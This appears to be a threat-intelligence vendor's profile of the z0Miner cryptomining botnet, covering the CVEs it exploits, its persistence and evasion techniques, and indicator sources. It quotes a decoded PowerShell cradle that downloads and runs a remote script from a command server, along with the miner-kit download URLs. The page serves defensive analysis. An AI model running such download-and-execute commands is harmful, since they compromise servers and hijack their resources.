z0Miner is a cryptomining malware family and botnet associated with opportunistic exploitation of internet-exposed servers to deploy XMRig-based Monero miners. It has been observed exploiting multiple remote code execution vulnerabilities in enterprise software and server applications, including Oracle WebLogic, Elasticsearch, Jenkins, Atlassian Confluence, and later Log4Shell-related attack surfaces. Campaigns attributed to z0Miner have targeted both Linux and Windows systems, with operators selecting platform-appropriate shell or PowerShell droppers after compromise.
Its infection chains commonly download scripts that remove competing miners or malware, retrieve miner binaries and configuration files, and launch cryptocurrency mining. z0Miner is also known to establish persistence through cron jobs on Linux and scheduled tasks or fraudulent services on Windows. In Confluence-related intrusions, it has additionally been observed deploying web shells to maintain access and facilitate follow-on execution. The malware’s tradecraft includes masquerading, process termination of rival miners, and disabling or interfering with security controls, reflecting a financially motivated objective centered on resource hijacking.
z0Miner activity has been linked across campaigns by shared infrastructure, payload patterns, and recurring use of XMRig components. It has appeared both as a primary payload in automated mass exploitation and as an auxiliary tool in broader intrusion sets, including ransomware operations where miners and other utilities were deployed on victim networks. The malware primarily targets vulnerable internet-facing servers rather than a specific industry vertical, making organizations with exposed and unpatched enterprise services especially at risk.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On August 25, Atlassian publicly released a patch for a critical remote code execution vulnerability in its popular corporate wiki solution Confluence. Just days later, a proof of concept (POC) code demonstrating how to exploit this CVE was published to GitHub. As expected, threat actors rapidly began exploiting publicly facing Confluence servers. | Trend Micro noted in a recent blog post, threat actors dropping the cryptominer, z0miner, were quick to jump on this vulnerability and have been observed broadly targeting vulnerable internet facing servers.
Recently, our Anglerfish honeypot system captured that z0Miner was also spreading by exploiting remote command execution vulnerabilities in ElasticSearch and Jenkins... Vulnerability exploit ElasticSearch RCE vulnerability CVE-2015-1427 Although it is an old vulnerability from 2015, z0Miner is still using it. | z0Miner is a malicious mining family that became active last year... Recently, our Anglerfish honeypot system captured that z0Miner was also spreading by exploiting remote command execution vulnerabilities in ElasticSearch and Jenkins.
This trojan was initially observed exploiting Oracle’s WebLogic Server RCE, CVE-2020-14882, late last year. | Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian’s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084.
It was found that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the same methodology as mentioned earlier to install XMRig crypto miners on affected systems. | The C&C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet... Our findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.
The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server’s local storage. | a cryptominer known as z0miner (previously seen dropped after exploitation of Log4J and a 2021 vulnerability in Atlassian)
“These included the z0Miner, the JavaX miner and at least two XMRig variants…”
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Establishing persistence by adding a crontab/scheduled task based on the operating system.
As in the early days, z0Miner will still download and execute malicious scripts on Pastebin periodically by setting up Cron tasks
On Windows systems... the script establishes persistence by adding a ... scheduled task
Attacker determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&C server... Executing downloaded dropper scripts.
powershell -enc ... decoded into the following code which downloads the sys.ps1 file: IEX (New-Object System.Net.Webclient).DownloadString('hxxp://27.1.1.34:8080/docs/s/sys.ps1')
IronNet observed what appeared to be a number of different botnets, in some cases pushing the same shell script but always ultimately leading to a XMRig coinminer.
z0Miner was initially active when it exploited the Weblogic unauthorized remote command execution vulnerability for propagation. Recently, our Anglerfish honeypot system captured that z0Miner was also spreading by exploiting remote command execution vulnerabilities in ElasticSearch and Jenkins
Establishing persistence by adding a crontab/scheduled task based on the operating system.
As in the early days, z0Miner will still download and execute malicious scripts on Pastebin periodically by setting up Cron tasks
On Windows systems... the script establishes persistence by adding a ... scheduled task
MITRE ATT&CK Tactics and Techniques ... Defense Evasion T1112: Modify Registry
Establishing persistence by adding a crontab/scheduled task based on the operating system.
As in the early days, z0Miner will still download and execute malicious scripts on Pastebin periodically by setting up Cron tasks
The files are written to temporary locations, masked as legitimate services/executables.
One of the downloaded scripts will also create a scheduled task called .NET Framework NGEN v4.0.30319 32 that poses as a .NET Framework NGEN task
Execution of post-exploitation scripts... post-exploitation linked clean up scripts that remove all traces of the dropper script mentioned above
MITRE ATT&CK Tactics and Techniques ... Discovery T1033: System Owner/User Discovery
MITRE ATT&CK Tactics and Techniques ... Discovery T1049: System Network Connections Discovery
MITRE ATT&CK Tactics and Techniques ... T1069.001: Permission Groups Discovery: Local Groups
MITRE ATT&CK Tactics and Techniques ... T1069.002: Permission Groups Discovery: Domain Groups
MITRE ATT&CK Tactics and Techniques ... T1082: System Information Discovery
MITRE ATT&CK Tactics and Techniques ... T1087.001: Account Discovery: Local Account
MITRE ATT&CK Tactics and Techniques ... T1087.002: Account Discovery: Domain Account
conf.txt will download the mining kit from the following 3 URLs and start mining. hxxp://27.1.1.34:8080/docs/config.json --> Mining Config file hxxp://178.62.202.152:8080/Wuck/java.exe --> XMRig Miner hxxp://27.1.1.34:8080/docs/solr.sh --> Miner Starter Shell script file
59 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Cryptominer payload observed being delivered in attacks exploiting vulnerable Confluence servers.
Cryptocurrency mining malware deployed post-exploitation; also linked in the content to Pastebin-based PowerShell downloaders and prior exploitation of Atlassian Confluence CVE-2021-26084.
Additional malicious tool observed being leveraged by Nokoyawa.
A cryptominer observed exploiting vulnerable internet-facing Confluence servers shortly after public disclosure of the flaw.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.